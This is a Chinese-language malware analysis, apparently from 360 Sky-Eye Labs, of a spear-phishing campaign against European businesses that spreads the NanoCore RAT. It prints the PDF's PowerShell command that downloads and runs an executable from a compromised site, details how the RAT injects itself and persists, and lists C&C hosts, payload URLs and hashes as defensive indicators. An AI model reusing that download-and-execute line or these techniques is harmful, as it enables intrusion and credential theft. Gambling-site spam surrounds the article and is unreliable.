盈讯足球比分网|华体足球比分直播|
關注我們
QRcode 郵件聯系 QRcode

某個商業定向攻擊活動分析

 feng  2,675 ℃  0條點評


概述

人在做,天在看。

近期360天眼實驗室監測到一些可疑電子郵件樣本,內容雖然都是通常的采購訂單、索要發票為主的通常社工套路,但投遞的對象主要為歐洲的一些商業公司。郵件包含一些文檔類型的附件(DOC、Excel、PDF等),受害者嘗試打開瀏覽時會提示不能正常顯示信息,需要啟用宏才可以。當手工點擊啟用導致惡意宏代碼得到執行以后,樣本將釋放或者下載下一步的惡意代碼并執行,以此控制受害者的計算機并竊取敏感信息。從投遞的目標和所竊取的信息來看,我們認為這是一類針對歐洲特定從業人員的商業定向攻擊行為。


樣本分析

一開始引起注意的郵件MD5:2040e6c0705c5b78d615c827f4a9ccbf

某個商業定向攻擊活動分析

其內容如下:

某個商業定向攻擊活動分析

郵件帶了一個PDF文件,對應的MD5為:ab3a27dd7bbee2f7a477dac5efe9655c

PDF文件包含OpenAction指令,打開文件時將會啟動powershell,由powershell下載并執行hxxp://www[.]winprop.com.sg/zxml/check/july1.exe

某個商業定向攻擊活動分析

代碼明文如下:

PowerShell   -ExecutionPolicy Bypass -command

(New-Object   System.Net.WebClient).DownloadFile('hxxp://www[.]winprop.com.sg/zxml/check/july1.exe',”$env:APPDATA/syshelper.exe”);

Invoke-Item   (”$env:APPDATA/syshelper.exe”)

將PE樣本下載下來,發現是一個.NET程序,將其脫殼后確認是NanoCoreRAT,一種商業間諜軟件,支持多種功能和插件,主要被用于竊取感染用戶的敏感信息、密碼等,另外有多種功能和插件,下面用我們關聯到的其中一個樣本做簡單的分析:

樣本SHA256:ffa42109954d7b79afc862a2a7ec828afe3b9c008731c7c7d175a41b1bb9332c

某個商業定向攻擊活動分析

NewLateBinding.LateCall(RuntimeHelpers.GetObjectValue(NewLateBingding.LateGet(AppDomain.CurrentDomain,null,”Load”,new object[]{},null,null,null)) ,null , “CreateInstance” , new object[] {“IE.IE”} , null , array2 , null )

這段代碼相當于

AppDomain.CurrentDomain.Load.CreateInstance(“IE.IE”);

其中IE是在Class3.smethod_2中解密的PE,通過反射調用其IE()方法

某個商業定向攻擊活動分析

獲取資源中的數據解密,密鑰為“Ykfgiozwzxl”,然后再解壓一次,得到另一個PE文件:

某個商業定向攻擊活動分析

對比global::IE.IE.injection的字符串,根據這個字符串來將解密出來的PE注入到對應的進程中(svchost、regasm、self),然后啟動對應的進程并注入:

某個商業定向攻擊活動分析

接著將自身拷貝到%appdata%/Roaming/[RandomStr]/[RandomStr2].exe(appdata在IE.path字段被指定),通過WScript.Shell.CreateShortcut.Save()生成快捷方式到%appdata%/Roaming/Microsof/Windows/Start Menu/Programs/Startup/目錄,實現自啟動。

說回前面提到的被注入的PE,這個被注入的PE其實是NanoCore真正的核心程序,其先將資源中的Data.bin解密,里面記載了NanoCore的配置信息,創建%appdata%/Roaming/[MachineGuid]/文件夾,將當前的(協調世界時)時間寫入run.dat并保存在這個目錄中后,將配置信息放入一個字典中用來檢索對應的配置,根據這些信息來執行對應的操作,包括設置自啟動、bypassUAC、設置訪問權限、加載插件等等。樣本中加載的插件為SurveillanceExClientPlugin.dll,該插件的主要功能是下載、發送log日志、鍵盤監控、應用程序監控、竊取密碼信息等;完成這些操作后,開始連接到C&C服務器,上傳用戶信息和接收下一步的指令,這里樣本中包含的C&C地址為frankief.hopto.me :

某個商業定向攻擊活動分析

下面是NanoCore的配置信息和說明:

KeyWord

Description

KeyboardLogging

鍵盤記錄

BuildTime

NanoCore構建時間

Version

NanoCore樣本

Mutex

樣本所創建的互斥體

DefaultGroup

-

PrimaryConnectionHost

首先連接的C&C地址

BackupConnectionHost

備用的C&C地址

ConnectionPort

端口

RunOnStartup

是否有開機自啟動功能

RequestElevation

是否需要更新

BypassUserAccountControl

是否有bypassUAC的功能

ClearZoneIdentifier

是否清除文件ZoneIdentifier標識

ClearAccessControl

是否清除訪問控制

SetCriticalProcess

-

PreventSystemSleep

是否開啟防睡眠模式

ActivateAwayMode

是否總處于活躍模式

EnableDebugMode

是否開啟調試模式

RunDelay

運行后延遲開始活動的時間

UseCustomDnsServer

使用指定的DNS服務器

PrimaryDnsServer

首先嘗試使用的DNS地址

BackupDnsServer

備用的DNS地址


關聯分析

根據360威脅情報中心的數據,我們關聯到一批相關的樣本。分析顯示攻擊者主要使用的RAT有NanoCore、HawkEye和jRAT,活躍時間從2015年1月一直到現在。攻擊方式主要通過魚叉郵件:

MD5 254fcc596d0979da69281b8d6a39cd2d

某個商業定向攻擊活動分析

下表給出了部分附件的文件名、偽裝的公司信息和文件HASH信息,可以看到這些附件的文件名均和訂單、報價等有關,結合郵件收件人信息和郵件內容,不難發現這些攻擊的目標均為歐洲地區的銷售、財務等從業人員。

文件名

偽裝的公司

文件HASH

Invoice and BDN.doc

HP

fcc91d65e7dcd4582e3508fa80a388ac

2015-937HK.doc

HP

e953e6b3be506c5b8ca80fbcd79c065e

bunker order.doc

-

9fc3cc3879668bd162832e13472aa339

enquiry.doc

HP

d2f0748aa97c1e71b753045174851c2a

IFO - 1500 MTS Bunker Stem Inquiry1.doc

HP

68099b5ec6005c3ccf108826ada45139

bunker inquiry.doc

-

66c516c92f0fbee26fa5c79f4b5af467

NEW ACCORD V1511 AMPOL.doc

-

1b07478171a9268377d4d20b3f73031c

stem inquiry.doc

HP

1bcd4e67d23efa985ead8f406fb1d0da

附件所連接的下載第二步惡意代碼網址如下。這些都是合法的站點,幕后攻擊者將這些站點攻陷后用于惡意代碼的分發。這種攻擊方式一方面能使防火墻認為這是合法的網站訪問而保證下載成功,另一方面也方便攻擊者隱藏自己的信息。

hxxp://www[.]winprop.com.sg/zxml/check/july1.exe;

hxxp://www[.]trilighttech.com/mm/kl/march.exe

hxxp://huakee[.]com.sg/uploads/anna.exe

hxxp://www[.]royalcosmo.com/404/crypted.exe

hxxp://commonwealthenergygroup[.]com/upload/add/scan.exe

hxxp://harborexpressservices[.]com/xml/load/feb.exe

hxxp://agrotechseeds[.]com/tmp/js/netbes.exe

hxxp://marina-group[.]com/util/mmm3.exe


結論

以各種文檔搭配宏進行惡意代碼傳播的方式目前極為流行(這回案例的樣本載體是PDF文件),雖然默認情況下需要用戶交互惡意代碼才有執行的機會,但有合適的社會工程學技巧配合下讓用戶確認并不像想象那么困難,利用Powershell繞過普通病毒查殺也已經是常規的做法。

本文涉及的案例看起來是個精心策劃并有一定資源支持的定向攻擊的商業間諜活動,值得我們做持續地跟蹤分析。


IOC

C&C:

frankief[.]hopto.me

樣本MD5:

e003fa7512d1f1c9fe770f26698d8bf9

0a75ddc77ce77e71203c4cab42bdc4d4

f0440a138420b795b3b47fb3383065f8

93b5d9e2e5b9e83098490afd386dc706

66c516c92f0fbee26fa5c79f4b5af467

af7d4bdfcf34d1a8c30b5ae190075a92

a155431fbb9936cd90a6bdebb155c47e

db616129fa1437e2ea48bafcca6961c3

93b5d9e2e5b9e83098490afd386dc706

e003fa7512d1f1c9fe770f26698d8bf9

56f57abbef6b1660a002b89edbb53b6a

9fc3cc3879668bd162832e13472aa339

c0a207529a45609a2d6f163cacf9c01f

bddf87cec8bc45369359cb6f5ac57bd2

a3eddf3532deeabddd7b597a88b50f78

4f6d806d028ba5a15c38f5fe82efcefb

5247fe1331cea8c12dd1f9fc0077f0c0

68099b5ec6005c3ccf108826ada45139

5247fe1331cea8c12dd1f9fc0077f0c0

4e1ed4eaac477b7081780f0da5577455

14aab6205ca208df5c9b7c5ad823eea0

e953e6b3be506c5b8ca80fbcd79c065e

a5c8b5296d419c2020cf6287b34523aa

de65da953f32be0d60181a59ea75f9e1

af7d4bdfcf34d1a8c30b5ae190075a92

aed9065c55ba96e377f8e4eab6ee9c2f

028233447e5ae78256462ed0e30928d9

45609c6b498c5f51680d6ebd384f277e

9fc3cc3879668bd162832e13472aa339

56f57abbef6b1660a002b89edbb53b6a

7731c10ae6fdac57e415e6f08fcf1da4

61c6baeea60827387a92e56e732a0033

0a75ddc77ce77e71203c4cab42bdc4d4

49e984ac6f89399463d8d9ed72a134a0

2b23a081c1a0574875be9f10325cc9de

a75f762848e483ece540875132749364

f87f7414c40aef8122da7642caceed5d

f9aebfce494cb5ae1679e1f9ac9652e9

d1a1a635d701be62d43e7c44c132eba8

f35204915836c431e4119a9a37f7b6d3

21194b8a07fc3a8d0a11b83087614ee3

5a3a7c2af80fc7997c8638d72835b7a2

849201701103617187f1e44858d8ce99

2406ef01503d019cf14d3a0d0f37cba4

ea1ca1b2b85f61fdb3336976f59df8ce

9fb319eb714d6aa47a06620873000f7a

6303cac85c1bcc249c9922dd7f5cde24

c4b337f9b0fbbcaf697137923ab756a2

8f292354628de2becf7d566e651f7bfb

66c516c92f0fbee26fa5c79f4b5af467

d01a7075ab9131aea4cf0719a8b8f40e

d2f0748aa97c1e71b753045174851c2a

3d09568536df4cd8f9bd55b85c6becda

d383a7795fc8ae3fff7bfb7109bbd0ab

777dde0a861c251b94c289057173a030

5a7e1fcacd7fd30ce14f6d53c0938e82

40d8453f3688b80f72415d8ac4089ad5

bb527ccfd3d9911991423851ca60072f

1c62cd4b4e8184c56b5a2d953c7ced03

2b32addc51b3f08a83063ded98846568

f6eac13843344fc0662e267d0763a720

1b07478171a9268377d4d20b3f73031c

82223804e4beab5e634c2782ec15ea81

b195d9469802ab12d025d14e767a621a

bbb911d69d317c9403b0616138010d6a

f0440a138420b795b3b47fb3383065f8

507739e7a11dc42d2c46187f7bd61a53

bddf87cec8bc45369359cb6f5ac57bd2

0bc8071c4c8ef9a9428f1f7aab153342

3f373286073b39d9af21f4bc115b791d

d64323258dc7fdb0f8b24c397afb3301

480d90b4736f91f21e4b412256a0c14d

3f03a029be2eae9bb96a90e61229c0fe

07fdf778f159266f624d2c09efd859a7

9ddc3f34d9fd38f8bd0027cdf7f61eeb

10c4c2c78a999f230e9827561822a896

1bcd4e67d23efa985ead8f406fb1d0da

8bb97ce79b6a8b9688871df9a076882a

9062791e4c79abc7eea891ff14453829

6d983e3ea6449a4e768fde2e417cbbf2

f1b115c24aab7a8bd03f52f05d7495c2

55700d86c99c535cc97bd301b376f17c

d1e2c2454f1061c4bc839b2461a0243d

本文由 360安全播報 原創發布,如需轉載請注明來源及本文地址。
本文地址:http://bobao.#/learning/detail/2911.html

本文標簽:
?安全公告:ASN.1編碼中存在堆內存崩潰漏洞
?分析Cknife,一個類似China Chopper的webshell管理工具(第二部分)
Joy:一款用于捕獲和分析網絡內部流量數據的工具Joy:一款用于捕獲和分析網絡內部流量數據的工具One-Lin3r:懶人的福音,滲透測試單行化工具One-Lin3r:懶人的福音,滲透測試單行化工具EvilURL v2.0一個生成用于釣魚攻擊的IDN域名的工具EvilURL v2.0一個生成用于釣魚攻擊的IDN域名的工具國產網站惡意代碼監測(網馬監控)工具優化版國產網站惡意代碼監測(網馬監控)工具優化版

已有0條評論,歡迎點評!

smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley

國際慣例, 沙發拿下 . . .


注冊帳號  |  忘記密碼
盈讯足球比分网
中国福利彩票官网杭州 英超宝贝无上装写真 彩金捕鱼季下载免费 山东11选5开奖记录 一码中特提前大公开 广东十一选五 福彩25选5开奖号码 足彩半全场玩法介绍 上海快3走势图表 广西11选5 同步开奖直播室